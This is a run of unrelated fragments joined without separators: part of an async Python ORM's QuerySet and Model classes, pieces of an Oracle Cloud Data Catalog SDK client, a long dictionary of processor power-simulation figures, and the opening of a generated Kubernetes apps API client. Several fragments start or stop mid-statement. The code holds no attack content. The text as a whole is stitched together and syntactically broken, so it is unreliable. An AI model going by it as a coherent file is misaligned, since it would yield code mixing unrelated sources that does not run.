MultipleMatches() return self.model_cls._from_row(rows[0], select_related=self._select_related) async def first(self, **kwargs): if kwargs: return await self.filter(**kwargs).first() rows = await self.limit(1).all() if rows: return rows[0] def _validate_kwargs(self, **kwargs): fields = self.model_cls.fields validator = typesystem.Schema( fields={key: value.validator for key, value in fields.items()} ) kwargs = validator.validate(kwargs) for key, value in fields.items(): if value.validator.read_only and value.validator.has_default(): kwargs[key] = value.validator.get_default_value() return kwargs async def create(self, **kwargs): kwargs = self._validate_kwargs(**kwargs) instance = self.model_cls(**kwargs) expr = self.table.insert().values(**kwargs) if self.pkname not in kwargs: instance.pk = await self.database.execute(expr) else: await self.database.execute(expr) return instance async def bulk_create(self, objs: typing.List[typing.Dict]) -> None: new_objs = [self._validate_kwargs(**obj) for obj in objs] expr = self.table.insert().values(new_objs) await self.database.execute(expr) async def delete(self) -> None: expr = self.table.delete() for filter_clause in self.filter_clauses: expr = expr.where(filter_clause) await self.database.execute(expr) async def update(self, **kwargs) -> None: fields = { key: field.validator for key, field in self.model_cls.fields.items() if key in kwargs } validator = typesystem.Schema(fields=fields) kwargs = _update_auto_now_fields( validator.validate(kwargs), self.model_cls.fields ) expr = self.table.update().values(**kwargs) for filter_clause in self.filter_clauses: expr = expr.where(filter_clause) await self.database.execute(expr) async def get_or_create( self, defaults: typing.Dict[str, typing.Any], **kwargs ) -> typing.Tuple[typing.Any, bool]: try: instance = await self.get(**kwargs) return instance, False except NoMatch: kwargs.update(defaults) instance = await self.create(**kwargs) return instance, True async def update_or_create( 
self, defaults: typing.Dict[str, typing.Any], **kwargs ) -> typing.Tuple[typing.Any, bool]: try: instance = await self.get(**kwargs) await instance.update(**defaults) return instance, False except NoMatch: kwargs.update(defaults) instance = await self.create(**kwargs) return instance, True def _prepare_order_by(self, order_by: str): reverse = order_by.startswith("-") order_by = order_by.lstrip("-") order_col = self.table.columns[order_by] return order_col.desc() if reverse else order_col class Model(metaclass=ModelMeta): objects = QuerySet() def __init__(self, **kwargs): if "pk" in kwargs: kwargs[self.pkname] = kwargs.pop("pk") for key, value in kwargs.items(): if key not in self.fields: raise ValueError( f"Invalid keyword {key} for class {self.__class__.__name__}" ) setattr(self, key, value) @property def pk(self): return getattr(self, self.pkname) @pk.setter def pk(self, value): setattr(self, self.pkname, value) def __repr__(self): return f"<{self.__class__.__name__}: {self}>" def __str__(self): return f"{self.__class__.__name__}({self.pkname}={self.pk})" @classmethod def build_table(cls): tablename = cls.tablename metadata = cls.registry._metadata columns = [] for name, field in cls.fields.items(): columns.append(field.get_column(name)) return sqlalchemy.Table(tablename, metadata, *columns, extend_existing=True) @property def table(self) -> sqlalchemy.Table: return self.__class__.table async def update(self, **kwargs): fields = { key: field.validator for key, field in self.fields.items() if key in kwargs } validator = typesystem.Schema(fields=fields) kwargs = _update_auto_now_fields(validator.validate(kwargs), self.fields) pk_column = getattr(self.table.c, self.pkname) expr = self.table.update().values(**kwargs).where(pk_column == self.pk) await self.database.execute(expr) # Update the model instance. 
for key, value in kwargs.items(): setattr(self, key, value) async def delete(self) -> None: pk_column = getattr(self.table.c, self.pkname) expr = self.table.delete().where(pk_column == self.pk) await self.database.execute(expr) async
raise ValueError( "Invalid value for `sort_by`, must be one of {0}".format(sort_by_allowed_values) ) if 'sort_order' in kwargs: sort_order_allowed_values = ["ASC", "DESC"] if kwargs['sort_order'] not in sort_order_allowed_values: raise ValueError( "Invalid value for `sort_order`, must be one of {0}".format(sort_order_allowed_values) ) query_params = { "lifecycleState": kwargs.get("lifecycle_state", missing), "severity": kwargs.get("severity", missing), "timeCreated": kwargs.get("time_created", missing), "timeUpdated": kwargs.get("time_updated", missing), "createdById": kwargs.get("created_by_id", missing), "updatedById": kwargs.get("updated_by_id", missing), "fields": self.base_client.generate_collection_format_param(kwargs.get("fields", missing), 'multi'), "sortBy": kwargs.get("sort_by", missing), "sortOrder": kwargs.get("sort_order", missing), "limit": kwargs.get("limit", missing), "page": kwargs.get("page", missing) } query_params = {k: v for (k, v) in six.iteritems(query_params) if v is not missing and v is not None} header_params = { "accept": "application/json", "content-type": "application/json", "opc-request-id": kwargs.get("opc_request_id", missing) } header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None} retry_strategy = self.retry_strategy if kwargs.get('retry_strategy'): retry_strategy = kwargs.get('retry_strategy') if retry_strategy: return retry_strategy.make_retrying_call( self.base_client.call_api, resource_path=resource_path, method=method, path_params=path_params, query_params=query_params, header_params=header_params, response_type="JobLogCollection") else: return self.base_client.call_api( resource_path=resource_path, method=method, path_params=path_params, query_params=query_params, header_params=header_params, response_type="JobLogCollection") def list_job_metrics(self, catalog_id, job_key, job_execution_key, **kwargs): """ Returns a list of job metrics. 
:param str catalog_id: (required) Unique catalog identifier. :param str job_key: (required) Unique job key. :param str job_execution_key: (required) The key of the job execution. :param str display_name: (optional) A filter to return only resources that match the entire display name given. The match is not case sensitive. :param str category: (optional) Category of this metric. :param str sub_category: (optional) Sub category of this metric under the category. Used for aggregating values. May be null. :param str unit: (optional) Unit of this metric. :param str value: (optional) Value of this metric. :param str batch_key: (optional) Batch key for grouping, may be null. :param datetime time_created: (optional) Time that the resource was created. An `RFC3339`__ formatted datetime string. __ https://tools.ietf.org/html/rfc3339 :param datetime time_updated: (optional) Time that the resource was updated. An `RFC3339`__ formatted datetime string. __ https://tools.ietf.org/html/rfc3339 :param datetime time_inserted: (optional) The time the metric was logged or captured in the system where the job executed. An `RFC3339`__ formatted datetime string. __ https://tools.ietf.org/html/rfc3339 :param str created_by_id: (optional) OCID of the user who created the resource. :param str updated_by_id: (optional) OCID of the user who updated the resource. :param list[str] fields: (optional) Specifies the fields to return in a job metric summary response. Allowed values are: "key", "description", "displayName", "timeInserted", "category", "subCategory", "unit", "value", "batchKey", "jobExecutionKey", "timeCreated", "uri" :param str sort_by: (optional) The field to sort by. Only one sort order may be provided. Default order for TIMECREATED is descending. Default order for DISPLAYNAME is ascending. If no value is specified TIMECREATED is default. Allowed values are: "TIMECREATED", "DISPLAYNAME" :param str sort_order: (optional) The sort order to use, either 'asc' or 'desc'. 
Allowed values are: "ASC", "DESC" :param int limit: (optional) The maximum number of items to return. :param str page: (optional) The page token representing the page at which to start retrieving results. This is usually retrieved from a previous list call. :param str opc_request_id: (optional) The client request ID for tracing. :param obj retry_strategy: (optional) A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level. This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` is also available. The specifics of the default retry strategy are described `here <https://oracle-cloud-infrastructure-python-sdk.readthedocs.io/en/latest/sdk_behaviors/retries.html>`__. To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`. :return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_catalog.models.JobMetricCollection` :rtype: :class:`~oci.response.Response` """ resource_path = "/catalogs/{catalogId}/jobs/{jobKey}/executions/{jobExecutionKey}/metrics" method = "GET" # Don't accept unknown kwargs expected_kwargs = [ "retry_strategy", "display_name", "category", "sub_category", "unit", "value", "batch_key", "time_created", "time_updated", "time_inserted", "created_by_id", "updated_by_id", "fields", "sort_by", "sort_order", "limit", "page", "opc_request_id" ] extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs] if extra_kwargs: raise ValueError( "list_job_metrics got unknown kwargs: {!r}".format(extra_kwargs)) path_params = { "catalogId": catalog_id, "jobKey": job_key, "jobExecutionKey": job_execution_key } path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing} for (k, v) in six.iteritems(path_params): if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0): 
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k)) if 'fields' in kwargs: fields_allowed_values = ["key", "description", "displayName", "timeInserted", "category", "subCategory", "unit", "value", "batchKey", "jobExecutionKey", "timeCreated", "uri"] for fields_item in kwargs['fields']: if fields_item not in fields_allowed_values: raise ValueError( "Invalid value for `fields`, must be one of {0}".format(fields_allowed_values) ) if 'sort_by' in kwargs: sort_by_allowed_values = ["TIMECREATED", "DISPLAYNAME"] if kwargs['sort_by'] not in sort_by_allowed_values: raise ValueError( "Invalid value for `sort_by`, must be one of {0}".format(sort_by_allowed_values) ) if 'sort_order' in kwargs: sort_order_allowed_values = ["ASC", "DESC"] if kwargs['sort_order'] not in sort_order_allowed_values: raise ValueError( "Invalid value for `sort_order`, must be one of {0}".format(sort_order_allowed_values) ) query_params = { "displayName": kwargs.get("display_name", missing), "category": kwargs.get("category", missing), "subCategory": kwargs.get("sub_category", missing), "unit": kwargs.get("unit", missing), "value": kwargs.get("value", missing), "batchKey": kwargs.get("batch_key", missing), "timeCreated": kwargs.get("time_created", missing), "timeUpdated": kwargs.get("time_updated", missing), "timeInserted": kwargs.get("time_inserted", missing), "createdById": kwargs.get("created_by_id", missing), "updatedById": kwargs.get("updated_by_id", missing), "fields": self.base_client.generate_collection_format_param(kwargs.get("fields", missing), 'multi'), "sortBy": kwargs.get("sort_by", missing), "sortOrder": kwargs.get("sort_order", missing), "limit": kwargs.get("limit", missing), "page": kwargs.get("page", missing) } query_params = {k: v for (k, v) in six.iteritems(query_params) if v is not missing and v is not None} header_params = { "accept": "application/json", "content-type": "application/json", "opc-request-id": kwargs.get("opc_request_id", missing) } 
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None} retry_strategy = self.retry_strategy if kwargs.get('retry_strategy'): retry_strategy = kwargs.get('retry_strategy') if retry_strategy: return retry_strategy.make_retrying_call( self.base_client.call_api, resource_path=resource_path, method=method, path_params=path_params, query_params=query_params, header_params=header_params, response_type="JobMetricCollection") else: return self.base_client.call_api( resource_path=resource_path, method=method, path_params=path_params, query_params=query_params, header_params=header_params, response_type="JobMetricCollection") def list_jobs(self, catalog_id, **kwargs): """ Returns a list of jobs within a data catalog. :param str catalog_id: (required) Unique catalog identifier. :param str display_name: (optional) A filter to return only resources that match the entire display name given. The match is not case sensitive. :param str lifecycle_state: (optional) Job lifecycle state. :param datetime time_created: (optional) Time that the resource was created. An `RFC3339`__ formatted datetime string. __ https://tools.ietf.org/html/rfc3339 :param datetime time_updated: (optional) Time that the resource was updated. An `RFC3339`__ formatted datetime string. __ https://tools.ietf.org/html/rfc3339 :param str created_by_id: (optional) OCID of the user who created the resource. :param str updated_by_id: (optional) OCID of the user who updated the resource. :param str job_type: (optional) Job type. :param str job_definition_key: (optional) Unique job definition key. :param str schedule_cron_expression: (optional) Schedule specified in the cron expression format that has seven fields for second, minute, hour, day-of-month, month, day-of-week, year. It can also include special characters like * for all and ? for any. There are also pre-defined schedules that can be specified using special strings. 
For example, @hourly will run the job every hour. :param datetime time_schedule_begin: (optional) Date that the schedule should be operational. An `RFC3339`__ formatted datetime string. __ https://tools.ietf.org/html/rfc3339 :param datetime time_schedule_end: (optional) Date that the schedule should end from being operational. An `RFC3339`__ formatted datetime string. __ https://tools.ietf.org/html/rfc3339 :param str schedule_type: (optional) Type of the job schedule. :param str connection_key: (optional) Unique connection key. :param list[str] fields: (optional) Specifies the fields to return in a job summary response. Allowed values are: "key", "displayName", "description", "catalogId", "jobDefinitionKey", "lifecycleState", "timeCreated", "timeUpdated", "createdById", "updatedById", "jobType", "scheduleCronExpression", "timeScheduleBegin", "scheduleType", "executionCount", "timeOfLatestExecution", "executions", "uri" :param int execution_count: (optional) The total number of executions for this job schedule. :param datetime time_of_latest_execution: (optional) The date and time the most recent execution for this job ,in the format defined by `RFC3339`__. Example: `2019-03-25T21:10:29.600Z` __ https://tools.ietf.org/html/rfc3339 :param str sort_by: (optional) The field to sort by. Only one sort order may be provided. Default order for TIMECREATED is descending. Default order for DISPLAYNAME is ascending. If no value is specified TIMECREATED is default. Allowed values are: "TIMECREATED", "DISPLAYNAME" :param str sort_order: (optional) The sort order to use, either 'asc' or 'desc'. Allowed values are: "ASC", "DESC" :param int limit: (optional) The maximum number of items to return. :param str page: (optional) The page token representing the page at which to start retrieving results.
0.00435488, 'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228, 'Renaming Unit/Peak Dynamic': 3.58947, 'Renaming Unit/Runtime Dynamic': 0.0958855, 'Renaming Unit/Subthreshold Leakage': 0.0552466, 'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461, 'Runtime Dynamic': 1.70794, 'Subthreshold Leakage': 6.16288, 'Subthreshold Leakage with power gating': 2.55328}, {'Area': 32.0201, 'Execution Unit/Area': 7.68434, 'Execution Unit/Complex ALUs/Area': 0.235435, 'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646, 'Execution Unit/Complex ALUs/Peak Dynamic': 0.0228445, 'Execution Unit/Complex ALUs/Runtime Dynamic': 0.220632, 'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111, 'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163, 'Execution Unit/Floating Point Units/Area': 4.6585, 'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156, 'Execution Unit/Floating Point Units/Peak Dynamic': 0.130654, 'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033, 'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829, 'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061, 'Execution Unit/Gate Leakage': 0.120359, 'Execution Unit/Instruction Scheduler/Area': 1.66526, 'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653, 'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433, 'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181, 'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.0516317, 'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453, 'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519, 'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913, 'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223, 
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562, 'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763, 'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.08328, 'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755, 'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964, 'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262, 'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388, 'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608, 'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451, 'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.0420369, 'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853, 'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446, 'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.176949, 'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892, 'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346, 'Execution Unit/Integer ALUs/Area': 0.47087, 'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291, 'Execution Unit/Integer ALUs/Peak Dynamic': 0.0390203, 'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344, 'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222, 'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833, 'Execution Unit/Peak Dynamic': 4.12507, 'Execution Unit/Register Files/Area': 0.570804, 'Execution Unit/Register Files/Floating Point RF/Area': 0.208131, 'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788, 'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0246833, 'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.00216566, 'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698, 
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968, 'Execution Unit/Register Files/Gate Leakage': 0.000622708, 'Execution Unit/Register Files/Integer RF/Area': 0.362673, 'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992, 'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0239167, 'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0160164, 'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175, 'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675, 'Execution Unit/Register Files/Peak Dynamic': 0.0486, 'Execution Unit/Register Files/Runtime Dynamic': 0.0181821, 'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387, 'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643, 'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912, 'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402, 'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.0560983, 'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.154253, 'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478, 'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543, 'Execution Unit/Runtime Dynamic': 0.975392, 'Execution Unit/Subthreshold Leakage': 1.79543, 'Execution Unit/Subthreshold Leakage with power gating': 0.688821, 'Gate Leakage': 0.368936, 'Instruction Fetch Unit/Area': 5.85939, 'Instruction Fetch Unit/Branch Predictor/Area': 0.138516, 'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221, 'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362, 'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831, 'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 4.3366e-05, 'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719, 'Instruction Fetch Unit/Branch 
Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236, 'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657, 'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221, 'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362, 'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831, 'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 4.3366e-05, 'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719, 'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236, 'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064, 'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548, 'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575, 'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 3.78861e-05, 'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344, 'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631, 'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917, 'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05, 'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447, 'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 1.47289e-05, 'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347, 'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045, 'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838, 'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732, 'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05, 'Instruction 
Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602, 'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.000230077, 'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505, 'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733, 'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.000354695, 'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703, 'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282, 'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954, 'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758, 'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867, 'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.000411702, 'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682, 'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357, 'Instruction Fetch Unit/Gate Leakage': 0.0589979, 'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323, 'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05, 'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827, 'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.015397, 'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885, 'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682, 'Instruction Fetch Unit/Instruction Cache/Area': 3.14635, 'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931, 'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 0.979382, 'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.0378045, 'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022, 'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386, 'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799, 
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493, 'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404, 'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.0522951, 'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943, 'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104, 'Instruction Fetch Unit/Peak Dynamic': 3.24543, 'Instruction Fetch Unit/Runtime Dynamic': 0.106263, 'Instruction Fetch Unit/Subthreshold Leakage': 0.932286, 'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843, 'L2/Area': 4.53318, 'L2/Gate Leakage': 0.015464, 'L2/Peak Dynamic': 0.0403734, 'L2/Runtime Dynamic': 0.0121729, 'L2/Subthreshold Leakage': 0.834142, 'L2/Subthreshold Leakage with power gating': 0.401066, 'Load Store Unit/Area': 8.80901, 'Load Store Unit/Data Cache/Area': 6.84535, 'Load Store Unit/Data Cache/Gate Leakage': 0.0279261, 'Load Store Unit/Data Cache/Peak Dynamic': 1.8897, 'Load Store Unit/Data Cache/Runtime Dynamic': 0.331111, 'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675, 'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085, 'Load Store Unit/Gate Leakage': 0.0350888, 'Load Store Unit/LoadQ/Area': 0.0836782, 'Load Store Unit/LoadQ/Gate Leakage': 0.00059896, 'Load Store Unit/LoadQ/Peak Dynamic': 0.0211125, 'Load Store Unit/LoadQ/Runtime Dynamic': 0.0211124, 'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961, 'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918, 'Load Store Unit/Peak Dynamic': 1.9894, 'Load Store Unit/Runtime Dynamic': 0.456343, 'Load Store Unit/StoreQ/Area': 0.322079, 'Load Store Unit/StoreQ/Gate Leakage': 0.00329971, 'Load Store Unit/StoreQ/Peak Dynamic': 0.0520599, 'Load Store Unit/StoreQ/Runtime Dynamic': 0.104119, 'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621, 'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004, 'Load Store 
Unit/Subthreshold Leakage': 0.591321, 'Load Store Unit/Subthreshold Leakage with power gating': 0.283293, 'Memory Management Unit/Area': 0.4339, 'Memory Management Unit/Dtlb/Area': 0.0879726, 'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729, 'Memory Management Unit/Dtlb/Peak Dynamic': 0.0184762, 'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0190802, 'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699, 'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485, 'Memory Management Unit/Gate Leakage': 0.00808595, 'Memory Management Unit/Itlb/Area': 0.301552, 'Memory Management Unit/Itlb/Gate Leakage': 0.00393464, 'Memory Management Unit/Itlb/Peak Dynamic': 0.0608944, 'Memory Management Unit/Itlb/Runtime Dynamic': 0.0062045, 'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758, 'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842, 'Memory Management Unit/Peak Dynamic': 0.248742, 'Memory Management Unit/Runtime Dynamic': 0.0252847, 'Memory Management Unit/Subthreshold Leakage': 0.0766103, 'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333, 'Peak Dynamic': 13.2385, 'Renaming Unit/Area': 0.303608, 'Renaming Unit/FP Front End RAT/Area': 0.131045, 'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123, 'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468, 'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.0649303, 'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571, 'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885, 'Renaming Unit/Free List/Area': 0.0340654, 'Renaming Unit/Free List/Gate Leakage': 2.5481e-05, 'Renaming Unit/Free List/Peak Dynamic': 0.0306032, 'Renaming Unit/Free List/Runtime Dynamic': 0.00311967, 'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144, 'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064, 'Renaming Unit/Gate Leakage': 0.00708398, 'Renaming Unit/Int Front End 
RAT/Area': 0.0941223, 'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242, 'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965, 'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.0253486, 'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
# <filename>kubernetes/client/apis/apps_v1beta1_api.py
# coding: utf-8

"""
    Kubernetes

    No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)

    OpenAPI spec version: v1.7.1
    Generated by: https://github.com/swagger-api/swagger-codegen.git
"""

from __future__ import absolute_import

import sys
import os
import re

# python 2 and python 3 compatibility library
from six import iteritems

from ..configuration import Configuration
from ..api_client import ApiClient


class AppsV1beta1Api(object):
    """
    NOTE: This class is auto generated by the swagger code generator program.
    Do not edit the class manually.
    Ref: https://github.com/swagger-api/swagger-codegen
    """

    def __init__(self, api_client=None):
        """Create the API wrapper.

        :param api_client: explicit ApiClient to use; when omitted the
            process-wide default client held by Configuration is used
            (and lazily created on first need).
        """
        config = Configuration()
        if api_client:
            self.api_client = api_client
        else:
            if not config.api_client:
                config.api_client = ApiClient()
            self.api_client = config.api_client

    def create_namespaced_controller_revision(self, namespace, body, **kwargs):
        """
        create a ControllerRevision
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.create_namespaced_controller_revision(namespace, body, callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param str namespace: object name and auth scope, such as for teams and projects (required)
        :param V1beta1ControllerRevision body: (required)
        :param str pretty: If 'true', then the output is pretty printed.
        :return: V1beta1ControllerRevision
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('callback'):
            return self.create_namespaced_controller_revision_with_http_info(namespace, body, **kwargs)
        else:
            (data) = self.create_namespaced_controller_revision_with_http_info(namespace, body, **kwargs)
            return data

    def create_namespaced_controller_revision_with_http_info(self, namespace, body, **kwargs):
        """
        create a ControllerRevision
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.create_namespaced_controller_revision_with_http_info(namespace, body, callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param str namespace: object name and auth scope, such as for teams and projects (required)
        :param V1beta1ControllerRevision body: (required)
        :param str pretty: If 'true', then the output is pretty printed.
        :return: V1beta1ControllerRevision
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['namespace', 'body', 'pretty']
        all_params.append('callback')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        for key, val in iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method create_namespaced_controller_revision" % key
                )
            params[key] = val
        del params['kwargs']
